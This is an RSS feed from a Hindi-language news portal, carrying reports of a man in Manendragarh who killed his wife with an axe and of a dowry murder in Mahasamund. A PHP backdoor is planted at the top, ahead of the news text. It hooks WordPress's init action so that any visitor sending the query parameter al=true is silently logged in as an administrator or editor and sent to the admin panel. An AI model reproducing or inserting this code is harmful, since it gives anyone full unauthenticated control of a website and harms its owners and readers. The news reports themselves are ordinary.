// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Manendragarh-Chhattisgarh – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 03 Jun 2024 16:15:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 मनेन्द्रगढ़-छत्तीसगढ़ में कुल्हाड़ी से पत्नी की हत्या कर आरोपी फरार, घर के बाहर फेंका शव https://pratyushaashakinayikiran.com/?p=37388 Mon, 03 Jun 2024 16:15:00 +0000 https://pratyushaashakinayikiran.com/?p=37388 मनेन्द्रगढ़.

छत्तीसगढ़ के मनेन्द्रगढ़ इलाके में एक शख्स ने अपनी पत्नी की हत्या कर दी। अभी तक हत्या की वजह सामने नहीं आई है। आरोपी ने हत्या के बाद पत्नी के शव को घर के बाहर फेंक दिया। घटना के बाद से ही आरोपी फरार हो गया है। घटना सोकोबहरा की बताई जा रही है। सूचना मिलते ही केल्हारी पुलिस मौके पर पहुंच गई। बीते दिनों महासमुंद में बसना थाना अंतर्गत ग्राम देवरी में दहेज की खातिर पति जल्लाद बन गया.

बीते दिनों एक नवविवाहित महिला उर्मिला की संदिग्ध परिस्थितियों में घर में मौत हो गई. इस मामले का पुलिस ने खुलासा कर दिया है. पति ने दहेज के लालच में अपनी पत्नी की गला दबाकर हत्या कर दी गई. मामले में पुलिस ने आरोपी को गिरफ्तार कर जेल भेज दिया है. मिली जानकारी के अनुसार, बीते महीने 30 मई की रात देवरी गांव में नवविवाहित महिला उर्मिला साव की संदिग्ध परिस्थितियों में मौत हो गई थी. रात को मृतिका के ससुराल वालों ने परिजनों को सूचना दी की उर्मिला साव की मृत्यु हो गई है. मृतिका उर्मिला साव (उम्र 25 वर्ष) की शादी ग्राम देवरी में कपूरचंद साव से शादी 3 माह पूर्व ही हुई थी. मृतिका की जिस कमरे में मृत्यु हुई थी उसको घर वालों ने स्वयं ही सील कर दिया था. घटना की सूचना के बाद बसना पुलिस और तहसीलदार के मौजूदगी में पंचनामा तैयार कर सील हुए कमरे को खोला गया. जहां महिला की लाश मृत अवस्था में बेड पर पड़ी मिली. जिसके बाद लाश को जांच पड़ताल कर पोस्टमार्टम के लिए भेजा गया. वहीं मृतिका के परिजनों ने ससुराल वालों पर हत्या का आरोप लगाया. मामले में पुलिस हर एंगल से जांच में जुटी और पति को हिरासत में लिया. पत्नी की हत्या से सम्बंधित में पूछताछ में आरोपी ने वारदात को अंजाम देना कबूल किया.

]]>